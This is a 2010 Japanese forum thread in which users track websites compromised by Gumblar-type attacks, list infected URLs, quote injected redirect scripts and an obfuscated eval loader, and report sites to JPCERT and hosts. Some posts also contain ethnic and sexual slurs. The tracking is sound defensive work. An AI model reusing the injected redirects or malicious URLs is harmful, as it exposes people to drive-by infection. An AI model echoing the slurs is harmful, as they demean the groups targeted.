Last-Modified: Sat, 29 May 2010 14:27:24 GMT : http://megalodon.jp/2010-0603-2340-59/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Etorihada%2Ecom%2Fjava%2Fdspflash%2Ejs
>>440
こんなんでいい?
0467名無しさん@お腹いっぱい。
2010/06/04(金) 10:15:30乙です
0468名無しさん@お腹いっぱい。
2010/06/04(金) 10:43:39木質燃料だけに…
0469名無しさん@お腹いっぱい。
2010/06/04(金) 11:10:450470名無しさん@お腹いっぱい。
2010/06/04(金) 11:47:10>>468
IPA、JPCERTに報告しました
>>469
IPA、JPCERTに報告しました
Aviraに検体を提出、返事待ち
0471名無しさん@お腹いっぱい。
2010/06/04(金) 13:26:42FFRWとかのレジストリ掃除ツール使えば手動で弄らなくてもそういう残骸はみんな消せるんだけどね
トラブルもほぼ起きない(RegSeekerみたいな漢専用ツールもあるから前評判は確かめた方がいいけど)
でも初心者じゃレジストリとか知らんだろうしな
俺は普通高校でhtml言語とかWordとかほんの少しやったけど
あんなもの教えるくらいならPCのセキュリティについて教えればいいのに
0472名無しさん@お腹いっぱい。
2010/06/04(金) 14:02:520473名無しさん@お腹いっぱい。
2010/06/04(金) 14:06:24何歳だか知らんけど、既に教える内容は変わっていると思われ。
オッサンの俺はそもそも学校でPCなんか教わらなかった
(PC9801でDOSでパソコン通信の時代。当時の高校生は
友達とはポケベルでコミュニケーションしていた)。
数学や英語などと違って技術の進歩に合わせて頻繁に変わる
(変えざるを得ない)から、先生が大学で修得していなかったことを
教える羽目になってる(教科書棒読みの)数少ない教科なんじゃないかな。
0474名無しさん@お腹いっぱい。
2010/06/04(金) 14:56:570475名無しさん@お腹いっぱい。
2010/06/04(金) 15:33:140476コテハン ◆8080adndqg
2010/06/04(金) 16:29:29【陥落サイトのURL悪用厳禁】
www●amakusaturigu●com/ ←絶賛放置中
www●kadaru●mydns●to/ ←相変わらず未対応(悪質)
↓↓↓↓↓
architects-egg●kadaru●mydns●to/ /(^o^)\
www●ad-jeaayf●com/links/
※※※アクセス注意!※※※
www●bestofunder●com/
↓
<script language="JavaScript">top.location = 'http://antiviru●ru/';</script>
<meta http-equiv="Refresh" content="0; URL="http://antiviru●ru/">
<center><a href="http://antiviru●ru/">Click</a></center>
<a href="http://antiviru●ru/"> Click Here</a>
※最下部のGumblar.xはきっと無害
www●bestofunder●com/indexst●html ←これが本家かな?
0477名無しさん@お腹いっぱい。
2010/06/04(金) 16:50:24http://www.ipa.go.jp/security/txt/2010/06outline.html
0478316
2010/06/04(金) 18:09:26Last-Modified: Fri, 04 Jun 2010 07:32:33 GMT
> 当財団ウェブサイトへのウィルス感染に関するお詫びとご報告
0479名無しさん@お腹いっぱい。
2010/06/04(金) 20:54:44これもこのウイルスの検出名でおk?
0480名無しさん@お腹いっぱい。
2010/06/04(金) 21:36:240481名無しさん@お腹いっぱい。
2010/06/04(金) 21:44:54常駐以外のを使ってこれを検出した
スプリクトに反応しただけなら問題ないから確認したかったが、スレチだったな
0482名無しさん@お腹いっぱい。
2010/06/04(金) 22:07:380483名無しさん@お腹いっぱい。
2010/06/04(金) 22:15:27場所見る前にブルスクった
まあ大丈夫だろうし、ありがとう
0484名無しさん@お腹いっぱい。
2010/06/04(金) 22:17:470485444
2010/06/04(金) 22:41:43どもです
関連リンク
[いま一番危ないぜい弱性は何だ? - 今週のSecurity Check:ITpro]
http://itpro.nikkeibp.co.jp/article/COLUMN/20100601/348706/
Java(JRA) 38%
Adobe Reader/Acrobat 36%
MDAC (UpdateしてないExcel)19%
[本当の攻撃はこれから? Gumblarが怖い本当の理由 − TechTargetジャパン 情報セキュリティ]
http://techtarget.itmedia.co.jp/tt/news/1004/28/news01.html
(要会員登録or[-CmsMembersControl])
「Gumblar(ガンブラー)の攻撃モデルは、近年まれに見る成功例」鵜飼裕司
2010.03.25と古いですが
最近見て、改竄された不名誉は甘んじて受ける姿勢が好感したので↓
[音素材サイト『ザ・マッチメイカァズ』閉鎖の危機?! 管理人が語る“ガンブラー”の脅威- ガジェット通信]
http://getnews.jp/archives/53016
0486名無しさん@お腹いっぱい。
2010/06/04(金) 22:45:16Dr.webの異常終了で、既知の問題だからおk
part4からの住人で対策はとっくにやってある
0487485
2010/06/04(金) 22:45:230488486
2010/06/04(金) 22:46:350489456
2010/06/05(土) 03:16:56封鎖確認
wakwak案外はやいww
0490名無しさん@お腹いっぱい。
2010/06/05(土) 09:02:43魚醤系316系の僕のちょうせんじん知的障害者まとめです
322 :316:2010/05/30(日) 03:42:15 ←なまえ316系 え?何これ怖いです。。。
324 :315:2010/05/30(日) 08:32:37 ←なまえ316系さん?315?え?自分にお返事 何これ怖いです。。。
315
378 :316:2010/06/01(火) 01:43:29 ←魚醤? え?魚醤てなんですか? あぁー。。。怖いです。。。(魚醤系)
>>375
あぁー。。。
>>280のアドレスで具具れば魚醤〜
419 :名無しさん@お腹いっぱい。:2010/06/02(水) 17:59:37 ←あ!魚拓になりました!よかったのであつた!
>>416
今回は魚拓をとってから電凸したのであつた
同人の魚拓好き腐まんこさん?あほ(ry
__、、=--、、 __
/ ・ ゙! /・ `ヽ
| ・ __,ノ (_ ・ |
ヽ、 (三,、, _) / 僕あほ ちゃうどー 電凸すきやねん電凸て何?
/ー-=-i'’ (____,,,.ノ
|__,,/ |__ゝ ← 新型Gumblar>316型 魚醤系 ボンクラ腐まんこ(推定)
〉 ) ( )
↑
ぼくは知能指数?12です僕です(ry
0491名無しさん@お腹いっぱい。
2010/06/05(土) 12:07:310492名無しさん@お腹いっぱい。
2010/06/05(土) 14:58:03反応しちゃダメだ。
華麗にスールだぞ
0493名無しさん@お腹いっぱい。
2010/06/05(土) 16:01:19www●amakusaturigu●com :Forbidden
www●bestofunder●com :Gredで「Misleading Application (BW017B)」
後は変化なし
0494コテハン ◆8080adndqg
2010/06/05(土) 16:36:21www●7500zei●com/ ←既に修正済
※ソースの最下部に8080の痕跡
<!--d2392c04537c5eaf61fe86d1998535a1-->
↓びんぐがコードを捕捉(きゃっしゅ)してた↓
cc●bingj●com/cache●aspx?q=site%3awww●7500zei●com%2f&d=4616900965040755&mkt=ja-JP&setlang=ja-JP&w=db69f17b,70c28a29
0495名無しさん@お腹いっぱい。
2010/06/05(土) 17:01:40何か検出されたので検索したらどうやら
ガンブラー系っぽいものだった。
ガンブラー対策はこまめにしてた。
削除しようとしたら
再起動を促されて再起動したけど
セーフモードですら起動せず・・・・
泣く泣くクリーンインストールしました。
何かこれまでの対策が効かない
新型亜種でも出回っているのですか?
0496名無しさん@お腹いっぱい。
2010/06/05(土) 17:27:15何を根拠にガンブラー言うのかわからんのだが・・・
>>4は8080系用の対策方法だから、違う系統の改竄に対しては効果が無い場合がある。
Gumblar(ガンブラー)=サイト改竄の総称と決め付けてしまった
某セキュリティソフトベンダーと、それをそのまま報道したマスゴミの罪は大きい
0498名無しさん@お腹いっぱい。
2010/06/05(土) 17:30:51検出ウイルス名は?
0499名無しさん@お腹いっぱい。
2010/06/05(土) 17:40:07ウイルス名はそもそもクリーンインストールしてしまったので
わからなくなってしまったんだけど、「downloader」みたいな単語があった
気がします。
検出されたウイルス名をググッたら完全にHITはしなかったんだけど
同じようなウィルス名のものがどうやらガンブラー系とのことでした。
ちなみにOSはXP SP3 でウイルス対策ソフトはAVAST5free、
火壁は PC TOOLS、ブラウザはIE7です。
アップデートとかこまめにやってましたが・・・
ほぼ毎日スキャンはしてました。
ちなみに今回のウイルスを検出したのは
windows defender でした。
0500名無しさん@お腹いっぱい。
2010/06/05(土) 17:58:47windows defenderでウイルスって検出するの?
downloaderこれだけじゃなんともいえん
他にもたくさんある
0501名無しさん@お腹いっぱい。
2010/06/05(土) 18:06:30何か色々穴がありそうな人だな
0502名無しさん@お腹いっぱい。
2010/06/05(土) 18:10:35IE7の時点でこまめにやってるとは言えない
0503名無しさん@お腹いっぱい。
2010/06/05(土) 18:17:27ttp://www.adobe.com/support/security/advisories/apsa10-01.html
0504名無しさん@お腹いっぱい。
2010/06/05(土) 18:29:23>>501-502
IE8は個人的な事情があって使ってませんでした。
今回はもう素直にIE8にしました。
>>500
毎日(平日)AVASTでスキャンしてたのですが
毎週末にdefenderでもスキャンします。
今回なぜかスパイウェアとして検出されました。
ウイルス名はやっぱり思い出せません。
ちなみにアングラなサイトには行かない程度に
ネットサーフィンする程度ですが・・・
0505名無しさん@お腹いっぱい。
2010/06/05(土) 18:33:330506名無しさん@お腹いっぱい。
2010/06/05(土) 18:52:13すいません。
それくらいは知っていましたが、
(大手企業のサイトも改ざんされた等)
当方それほどPCに関するスキルがないので
何とかそれなりに情報収集して対応してきた
つもりです。
でも結局やられてしまったので
ちょっと悔しくてここで愚痴っただけです。
周辺機器のドライバのインストールや
年賀状の住所録を作り直すのが
めんどくさいですね。
残りの作業も今からがんばります。
0507名無しさん@お腹いっぱい。
2010/06/05(土) 18:52:22おまけに初心者スレにこの類を扱うスレは存在しないからここにすがるしかない
0508名無しさん@お腹いっぱい。
2010/06/05(土) 19:18:360509名無しさん@お腹いっぱい。
2010/06/05(土) 19:31:00見事な開き直りですね
0510名無しさん@お腹いっぱい。
2010/06/05(土) 21:24:05いくつかレスキューディスクが提供されてるので試して欲しかったですね
■ノートン レスキュー ツール
http://security.symantec.com/nbrt/overview.asp
■Dr.Web LiveCD
http://drweb.jp/support/LiveCD.html
駆除できなくても住所録の救出くらいできたはず
■WinPE
http://lets-go.hp.infoseek.co.jp/winpe_index.html
0511名無しさん@お腹いっぱい。
2010/06/05(土) 23:38:06IEはデフォルトの設定だと穴が多いから
Firefox+NoScript+AdblockPlus
この組み合わせを推奨する
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|http://*:8080* をブロック
0512名無しさん@お腹いっぱい。
2010/06/05(土) 23:46:350513名無しさん@お腹いっぱい。
2010/06/06(日) 02:09:59PC内全てのブラウザに適用出きるようにすればええがな
0514名無しさん@お腹いっぱい。
2010/06/06(日) 02:43:380515名無しさん@お腹いっぱい。
2010/06/06(日) 03:08:12糞企業のザルPCには激しくオススメしたい組み合わせ
0516名無しさん@お腹いっぱい。
2010/06/06(日) 04:43:29攻略コードも既に出回ってるって。
0517名無しさん@お腹いっぱい。
2010/06/06(日) 05:02:54あれはあれでクラッシュするサイトがあったりしてまだまだ不安定な代物なのに。
0518名無しさん@お腹いっぱい。
2010/06/06(日) 05:31:38のんびりし過ぎてユーザーから反感を買ってるのも知らずに・・・
0519名無しさん@お腹いっぱい。
2010/06/06(日) 06:55:030520名無しさん@お腹いっぱい。
2010/06/06(日) 09:02:26Vista以降のOSとIE8以降の組み合わせで使える保護モード使えよ
そうすりゃfirefoxより安全だろ
ChromeのWindows版や、IE8以降+Vista以降は、ブラウザの主要部分を限定された権限で動かして、
ブラウザがセキュリティーホールでやられても影響が限定されるようになってる
firefoxは全部標準の権限で動いてるから、ブラウザがセキュリティーホールでやられるとまともに影響をうける
0521名無しさん@お腹いっぱい。
2010/06/06(日) 13:46:49www●pacs●co.jp/pacs/hist_walk/walk_miyagi04/senwaka_saisyou_temp/
aguseとgredでチェックしても、安全としか出ないのですが
誤検出なんでしょうか?
0522名無しさん@お腹いっぱい。
2010/06/06(日) 13:55:31どんなトロイ?
0523名無しさん@お腹いっぱい。
2010/06/06(日) 15:38:56ここに仕込まれてる
<script language=JavaScript>eval(unescape('var%20codelock_bas〜〜
0524名無しさん@お腹いっぱい。
2010/06/06(日) 16:04:150525名無しさん@お腹いっぱい。
2010/06/06(日) 16:04:170526名無しさん@お腹いっぱい。
2010/06/06(日) 16:12:21どこにあるの?
0527名無しさん@お腹いっぱい。
2010/06/06(日) 16:59:13blaugrana●sakura●ne●jp/
0528名無しさん@お腹いっぱい。
2010/06/06(日) 17:49:52難読化されてるけど
バナーの画像を入れ替えてるだけじゃないの?
0529名無しさん@お腹いっぱい。
2010/06/06(日) 18:08:49具体的には分かりませんが
らしき物が見受けられます
いかがでしょうか?
0530名無しさん@お腹いっぱい。
2010/06/06(日) 18:13:080531名無しさん@お腹いっぱい。
2010/06/06(日) 18:49:160532名無しさん@お腹いっぱい。
2010/06/06(日) 19:11:35ソフトは穴だらけだわバージョン更新を餌にgetplusとか怪しげなもん植えつけようとするわ
0533名無しさん@お腹いっぱい。
2010/06/06(日) 19:49:44http://megalodon.jp/2010-0321-0041-21/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.bestofunder.com%2Findex.html
再感染で.htaccess改竄?
http://www.dan.co.uk/viewsource/index.php?url=http://www●bestofunder●com/
xxxx.ruに飛ばされるから怪しいけど
ここにリンクあるから川島って人が管理してるサイトらしい
http://0000181856.seesaa.net/archives/200811-1.html
0534名無しさん@お腹いっぱい。
2010/06/06(日) 20:49:34Index丸見えで、非公開のつもりのファイルが感染してます
image/sample/sample/index6.html
怪しげな情報商材も公開中です
0535名無しさん@お腹いっぱい。
2010/06/06(日) 21:45:09>>3-6の対策、こまめな定義更新・ウイルススキャンを地道にしていくしかないか
0536名無しさん@お腹いっぱい。
2010/06/06(日) 21:50:21お前のアンカーがヤバイ
0537名無しさん@お腹いっぱい。
2010/06/06(日) 21:54:48氏ね
何考えてるんだ
0539名無しさん@お腹いっぱい。
2010/06/06(日) 22:06:120540名無しさん@お腹いっぱい。
2010/06/06(日) 22:08:540541535
2010/06/06(日) 22:14:48> 使用していないものはアンインストール推奨です
>
> ■ Windows XPは可能ならば新しいOSに
> ■ Windows Update / Microsoft Updateを更新
> ・XP以下は念のためMicrosoft Updateに変更してアップデートする
> ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
> ttp://get.adobe.com/jp/reader/
> ・インストール後本体をアップデート
> ヘルプ → アップデートの有無をチェック
> ・Acrobat Javascriptをオフにする
> 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
> ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
> ttp://get.adobe.com/jp/flashplayer/
> ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
> ・Flash Playerのバージョン確認
> ttp://www.adobe.com/jp/software/flash/about/
> ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
> ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
> ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
> ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
> ttp://www.java.com/ja/
> ・Javaのバージョン確認
> ttp://www.java.com/ja/download/installed.jsp
> ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
> ttp://www.apple.com/jp/quicktime/download/
> ■ RealPlayerを更新 (使っていないならアンインストール)
> ttp://jp.real.com/?mode=basic
ここだけ重点にして
0542名無しさん@お腹いっぱい。
2010/06/06(日) 22:16:140543名無しさん@お腹いっぱい。
2010/06/06(日) 22:17:10自分が踏んじゃうからこわーい><
って言ってんじゃねえよ
0544名無しさん@お腹いっぱい。
2010/06/06(日) 22:19:420545名無しさん@お腹いっぱい。
2010/06/06(日) 22:34:47タスマネプロセスの説明項目
このあたりに不明とか書いてたら怪しいと思っていいのかな
0546名無しさん@お腹いっぱい。
2010/06/06(日) 23:01:02たぶん誤検知
いかにもな難読化コードなので誤判定されるのも無理ないけど
0547名無しさん@お腹いっぱい。
2010/06/06(日) 23:05:22ちょっとまさぐってみたら
XXXXXXX●ru/skank/index●php?page=3d-anime-hentai-videos
3Dアニメ変態ビデヲwwwww
※何が落ちてくるかは知らん
0548547
2010/06/06(日) 23:21:51アクセスする毎に飛ばされる先が違う
thermalvisit●ru
awmmagazine●ru
visitthermal●ru
他にもあるかもしれん
0549名無しさん@お腹いっぱい。
2010/06/07(月) 11:35:56Avira「HTML/Crypted.Gen」
Avast「JS:Redirector-CE [Trj] 」
Dr.Web「Trojan.MulDrop.1010」
0550名無しさん@お腹いっぱい。
2010/06/07(月) 14:26:360551コテハン ◆8080adndqg
2010/06/07(月) 14:34:05www●gal-love●com/
katusika●net/
d-pic●net/repo/ ←トップページ以外は相変わらず絶賛放置中
www●bbfactory●jp/
dental-mos●net/ap/14/4/
cre2cash●f01●jp/ ←<!--カス対応中w-->
www●ad-jeaayf●com/links/
www12●plala●or●jp/atakashi/sk/
elyess●hotel-prony-elysees-paris●com/ao/5/3/index●html
0552名無しさん@お腹いっぱい。
2010/06/07(月) 16:08:520553名無しさん@お腹いっぱい。
2010/06/07(月) 17:27:12http://www●marucen●co●jp/
http://www●haisui●com/
http://webright●jp/
http://kayak-nature●vaxponys●com/
JRCERTに報告しました
>>551
JPCERTに報告しました
0554名無しさん@お腹いっぱい。
2010/06/07(月) 17:28:020555名無しさん@お腹いっぱい。
2010/06/07(月) 17:32:09次からは気をつけてね
0556名無しさん@お腹いっぱい。
2010/06/07(月) 17:44:09http://internet.watch.impress.co.jp/docs/news/20100607_372679.html
0557名無しさん@お腹いっぱい。
2010/06/07(月) 17:48:26動画サイト見るのも命がけの時代か
0558名無しさん@お腹いっぱい。
2010/06/07(月) 17:53:24たまたま運良く被害をまぬがれていただけらしい
0559コテハン ◆8080adndqg
2010/06/07(月) 18:09:37過去に陥落履歴があった(ような気がする)vaxponys●comを掘ってみた・・・
【陥落サイトのURL悪用厳禁】
best-shoper●vaxponys●com/
dream-girls●vaxponys●com/
diet-mates●vaxponys●com/
rocken-house●vaxponys●com/
german-house●vaxponys●com/
rice-premium123●vaxponys●com/
wine-house●vaxponys●com/
premium-farmer●vaxponys●com/
dyson-good●vaxponys●com/
kayak-house●vaxponys●com/
event-mate●vaxponys●com/
natural-warm●vaxponys●com/
rooms-sayaka●vaxponys●com/
祝!\(^o^)/全滅
※他にもあるかも・・・
0560コテハン ◆8080adndqg
2010/06/07(月) 18:16:18■セーフ ブラウジング
vaxponys●com の診断ページ
www●google●com/safebrowsing/diagnostic?site=vaxponys●com/&hl=ja
>過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。
>不正なソフトウェアは vaxponys●sakura●ne●jp/, supernewstuff●ru/ を含む 2 個のドメインでホストされています。
>vaxponys●sakura●ne●jp/
(;゚д゚)・・・
0561名無しさん@お腹いっぱい。
2010/06/07(月) 18:25:13ここで報告されているのは殆どavast!で検出できるし
0562名無しさん@お腹いっぱい。
2010/06/07(月) 18:36:58専ブラでカーソルを合わせるだけなら問題ないのでは?
0563名無しさん@お腹いっぱい。
2010/06/07(月) 18:42:42迷い込んだ初心者が信用して上から順に素直に何も疑わずクリックすることが想像される
住人の心配は全くしていない
Katesリバースエンジニアリングされて中身暴露されたからじゃない?
0565名無しさん@お腹いっぱい。
2010/06/07(月) 19:24:330566名無しさん@お腹いっぱい。
2010/06/07(月) 19:50:31>>560
「vaxponys●sakura●ne●jp」をさくらに通報しました
>>561
取りこぼした検体を提出して検出率100%を目指すというのはどうか
>>565
>>368の時点でJRCERTに提出したんですけど、まだダメですか
もう一回通報しとこうかなあ…
0567名無しさん@お腹いっぱい。
2010/06/07(月) 22:46:060568名無しさん@お腹いっぱい。
2010/06/07(月) 22:51:14罠リンクを罠リンクと見抜ける人間でないと(2chを使う事は)難しい
0569名無しさん@お腹いっぱい。
2010/06/07(月) 22:52:36脆弱性報告されてたりする?
セキュリティ的にFlashよりいいのなら
ようつべも使えばいいのにと思うのだが
0570名無しさん@お腹いっぱい。
2010/06/07(月) 23:01:330571名無しさん@お腹いっぱい。
2010/06/07(月) 23:26:52このスレがあるから日本でのパンデミックが抑えられてるとも言える。
細々した陥落サイトを閉鎖・修正・消滅に追い込んでる人達に感謝しろよ。
0572名無しさん@お腹いっぱい。
2010/06/07(月) 23:28:45最近出てるのは確認のしようがないらしい
駆除法もクリーンインストール(普通のウイルスやマルウェアならそこまで行きつかない最終手段)しかないって有様だしな
マスゴミや政府がザルなせいで被害は広がる一方
0573名無しさん@お腹いっぱい。
2010/06/07(月) 23:52:52FTP以外のメール等のアカウントも抜かれるなら
迷惑メールがいっぱいくるのかな
0574名無しさん@お腹いっぱい。
2010/06/07(月) 23:55:15感染してるかもしれないってことですか?
0575名無しさん@お腹いっぱい。
2010/06/07(月) 23:57:51迷惑メールは受信だけでなく送信もありえる
それによってフリーメールアカウントなら停止させられるかもしれない
0576名無しさん@お腹いっぱい。
2010/06/07(月) 23:58:48感染後にDLする何らかのウイルスを検出する可能性が高い
偽セキュリティソフトなんかがその典型
0577名無しさん@お腹いっぱい。
2010/06/08(火) 00:04:02IE8/9+Vista/7で保護モード使うか、ChromeのWindows版使うかすればいいのに
いまだにセキュリティー対策にIEからfirefoxにかえろとか大嘘おしえてGumblarとかに引っかかるユーザーを
量産してるアホはいますぐ腹を切るべし
0578名無しさん@お腹いっぱい。
2010/06/08(火) 00:05:56CPUがPenIIIなのでDEPもありません><
0579名無しさん@お腹いっぱい。
2010/06/08(火) 00:09:27アカウントと言えばYouTube、ニコ動のやつも何か利用されるのだろうか
著作物とかが勝手に違法アップロードされるとか
0580名無しさん@お腹いっぱい。
2010/06/08(火) 00:30:38ここまでやっておいて死刑ですら生温いわ
0581名無しさん@お腹いっぱい。
2010/06/08(火) 00:30:51script切ってない本人の問題
IEでないと見れないどこかのキムチ国ブラウザなんかいらないからw
0582名無しさん@お腹いっぱい。
2010/06/08(火) 00:31:080583名無しさん@お腹いっぱい。
2010/06/08(火) 00:32:22LinuxやMacOSへGO!
0584名無しさん@お腹いっぱい。
2010/06/08(火) 00:34:43それよりしっかりパッチ当てるなりサードパーティ製品のアップデートしろ
0585名無しさん@お腹いっぱい。
2010/06/08(火) 00:43:11ゼロディされたらこれが唯一の防御壁だろ
0586名無しさん@お腹いっぱい。
2010/06/08(火) 00:50:44ドライブバイダウンロードやおかしな通信を防げる
ただし、最初に感染した時に何されたかはわからないけど
0587名無しさん@お腹いっぱい。
2010/06/08(火) 01:15:20url_content, headers_content, body_contentやurl_re, headers_re, body_reで
拒否許可やアラートのルール作れるらしいから
0588名無しさん@お腹いっぱい。
2010/06/08(火) 01:28:23ところがfirefoxは設計が古臭く、やられにくいようにできるけど、やられたらダメっていうあいかわらずの旧タイプだな
IEやChromeは、やられても安心っていう方向に進化した
0589名無しさん@お腹いっぱい。
2010/06/08(火) 01:36:170590名無しさん@お腹いっぱい。
2010/06/08(火) 03:08:26使ってれば判る事なんだが、アンチ糞は脳内だから知らないんだよ
0591あんちたった ◆MOTO.0SDfQ
2010/06/08(火) 03:13:30( ゚Д゚)ハァ?
やられたら安全も糞もねぇ終わり。
どのブラウザも同じでしょ?
どのブラウザでもやられないようにすることが大事。
拾い食いして毒食べても平気な人間が居ないのと一緒。
0592名無しさん@お腹いっぱい。
2010/06/08(火) 05:32:40ttp://kb2.adobe.com/jp/cps/849/cpsid_84948.html
0593名無しさん@お腹いっぱい。
2010/06/08(火) 05:55:300594593
2010/06/08(火) 06:04:100595名無しさん@お腹いっぱい。
2010/06/08(火) 06:46:28特別に低能な情弱なんだけどね
0596名無しさん@お腹いっぱい。
2010/06/08(火) 07:02:10FFって馬鹿じゃねーの
0597名無しさん@お腹いっぱい。
2010/06/08(火) 07:10:42ブラウザがセキュリティーホールでやられたとしても、さらにOSのセキュリティーホールまで
やられない限り影響をうけない
もちろん、レンダリングと同じプロセスで動くプラグインにセキュリティーホールがあってやられたとしても同様
プロセスがやられたらおしまいな火狐とは違う
0598名無しさん@お腹いっぱい。
2010/06/08(火) 07:48:330599名無しさん@お腹いっぱい。
2010/06/08(火) 08:24:14普通に使ってればこだわり以前にFxだわ
悔し紛れに恥の上塗りかよ
0600名無しさん@お腹いっぱい。
2010/06/08(火) 08:25:190601名無しさん@お腹いっぱい。
2010/06/08(火) 09:46:17このスレ的には「>>4をやっておけばおk」なんだから
ブラウザがどうのこうのって話は他でやってくれ
0602名無しさん@お腹いっぱい。
2010/06/08(火) 09:59:34berkeleyhouse●co●jp
英会話の前にパソコンインストールしなおしたほうが良いね
0603名無しさん@お腹いっぱい。
2010/06/08(火) 10:19:38■有料版:2万円(税別)/月
http://blog.adlibjapan.jp/2010/02/sitemiharu.html
これ誤判定でしょ?
http://blog.sitemiharu.com/?p=10031
http://blog.sitemiharu.com/?p=10021
0604名無しさん@お腹いっぱい。
2010/06/08(火) 10:49:54またデジロックかぁ
通報しても落ちないんだろうな
0605名無しさん@お腹いっぱい。
2010/06/08(火) 11:32:56「〜使ってる俺一番優秀、それ以外の奴はゴミ」って優越感に浸りたい奴の荒らし目的だから触る人がいる限りどうしようもないね
ここID出ないし、かといって初心者板にはガンブラー関連のスレないし
テンプレ偽造で踏ませるとか犯罪まがいも起こるしマジPC初心者には地獄
0606名無しさん@お腹いっぱい。
2010/06/08(火) 13:04:01simple●703●jp/mens
0607名無しさん@お腹いっぱい。
2010/06/08(火) 13:30:04IEのあらゆるバージョンにローカル・ファイルへの不正アクセスを許す脆弱性
「設計上の基本特性に関わる問題であるため修正は難しい」との見解を示す
http://www.computerworld.jp/topics/move/173909.html
0608名無しさん@お腹いっぱい。
2010/06/08(火) 13:31:22あれが居着くとアフォ発言が増えてスレが荒廃する。
0609名無しさん@お腹いっぱい。
2010/06/08(火) 13:44:39以下にリダイレクトされるけどコードが確認できないね
suspended.503.jp/pc.php
0610名無しさん@お腹いっぱい。
2010/06/08(火) 14:44:37メル凸したらarenaが動いてくれた様です
まだ一部感染していますが、ウイルスの駆除が始まりました
>>606
aguseで引っ掛けると「Pegel.aa」を検出、Gred及びDr.Webでは問題なし
ソースも問題ないですし、.jsなども存在せず…
リダイレクト先がphpとかそういう理由で検出してるとか?
0611名無しさん@お腹いっぱい。
2010/06/08(火) 14:54:51megalodon.jp/2010-0608-1449-01/www.dan.co.uk/viewsource/index.php?url=http://webcache.googleusercontent.com/search?q=cache:8xe8YaFjQrUJ:dear16●501●jp/deam13/
0612名無しさん@お腹いっぱい。
2010/06/08(火) 16:39:04www●nsc-com●co●jp
www●nagatan●co●jp
同じサーバ上で同じように改ざんされてるとは…。
コンテンツ管理者が同じなのか?
0613名無しさん@お腹いっぱい。
2010/06/08(火) 18:17:20指定されたメールアドレスに結果が送信されるます。
日本語が不自由な・・・
0614コテハン ◆8080adndqg
2010/06/08(火) 18:26:24一件だけ投下・・
www●saiwai-estate●net ←なんか変ww
0615名無しさん@お腹いっぱい。
2010/06/08(火) 19:56:05ページ中にこれを発見!!
reachsaw●ru:8080/meebo-com/google●com/monster●com●php
悪用禁止!!
0616名無しさん@お腹いっぱい。
2010/06/09(水) 00:05:42その4の対策やっても、Flashの0-dayとかやられるじゃん
Flashの0-Day対策するには、別の方法使うしかない
0617名無しさん@お腹いっぱい。
2010/06/09(水) 01:36:02…と思ったら.jsひとつ修正して動きなしってどういうことなのorz
なんかダメっぽいのでJPCERTとIPAに通報しました
>>607
Secuniaを見る限りでは其処から進展してないっぽいです
Firefoxにも脆弱性が見つかってるみたいですし、どうしたものか
>>611
なるほど、そういうことでしたか
しかしaguseはここのところおかしな事続き
>>612
JPCERTに通報、反応待ち
>>614
メル凸済み、反応待ち
0618名無しさん@お腹いっぱい。
2010/06/09(水) 03:59:56www.microsoft.com/technet/security/bulletin/ms10-035.mspx
0619名無しさん@お腹いっぱい。
2010/06/09(水) 11:32:49www●enzou●jp
0620名無しさん@お腹いっぱい。
2010/06/09(水) 12:08:10www●ad-jeaayf●com/links/ ←デジロック
0621名無しさん@お腹いっぱい。
2010/06/09(水) 13:12:280622名無しさん@お腹いっぱい。
2010/06/09(水) 13:19:380623コテハン ◆8080adndqg
2010/06/09(水) 14:46:48www●ekinavi●sakura●ne●jp/diet/
www●kamituji1●com/
www●bbfactory●jp/ ←絶賛放置中(再掲載)
stromstein●fc2web●com/
0624名無しさん@お腹いっぱい。
2010/06/09(水) 14:55:10yasubei●net
0625コテハン ◆8080adndqg
2010/06/09(水) 18:39:34seikon●nes3●com
www4●atpages●jp/kessan/
掘れば掘るほど出てくる・・orz
0626名無しさん@お腹いっぱい。
2010/06/09(水) 19:54:16感染の告知は無しでしょうか・・・
グーグルで検索しているお客様は逃げていきますョ
0627名無しさん@お腹いっぱい。
2010/06/09(水) 21:06:13まぁどんどんプログラムの亜種が出てるから「全部感知!」には至ってないけど……
0628名無しさん@お腹いっぱい。
2010/06/09(水) 23:01:17なぜ?
0629名無しさん@お腹いっぱい。
2010/06/10(木) 01:26:54キャッシュに改ざんの刻印がある
webcache●googleusercontent●com/search?q=cache:sWB9ZGzluRsJ:www.enzou●jp/
0630名無しさん@お腹いっぱい。
2010/06/10(木) 01:47:390631名無しさん@お腹いっぱい。
2010/06/10(木) 04:22:43何を検索しても解析対象外になる…
0632名無しさん@お腹いっぱい。
2010/06/10(木) 09:24:120633名無しさん@お腹いっぱい。
2010/06/10(木) 10:44:030634名無しさん@お腹いっぱい。
2010/06/10(木) 11:18:44ひっそり修正ですかね
0635コテハン ◆8080adndqg
2010/06/10(木) 18:15:47※8080じゃないやつ
www●alive-kanmoku●com/ansin●html
www●alive-kanmoku●com/bamen-310●html など・・・
www●acl-music●jp/ ←再掲載(改竄されすぎて絶賛崩壊中)
www●minatomo●jp/cart/CreProduct●php ←放置したまま逃げた?
iiji●biz/hirameki/
demchik●100free●com/3●html
0636名無しさん@お腹いっぱい。
2010/06/10(木) 19:12:06これでやっと凸先のチェックが出来る…さて頑張りますか
>>619-624
JPCERTに報告しました
「www●ekinavi●sakura●ne●jp/diet/」はnotfoundですか?
>>634
駆除が完了するまでに3回ほどメールで突っ込んでます
おかげさまでもう突っ込む気になれません
ところでさっきからPegel.bc仕込んだhtmlメールが何通も届いて…
0637名無しさん@お腹いっぱい。
2010/06/10(木) 20:20:090638名無しさん@お腹いっぱい。
2010/06/10(木) 20:32:30皆さんの善意は尊いですが
誰も見ない細々した陥落サイトが、このスレに報告され、
悪用され、被害拡大している可能性も否定できません
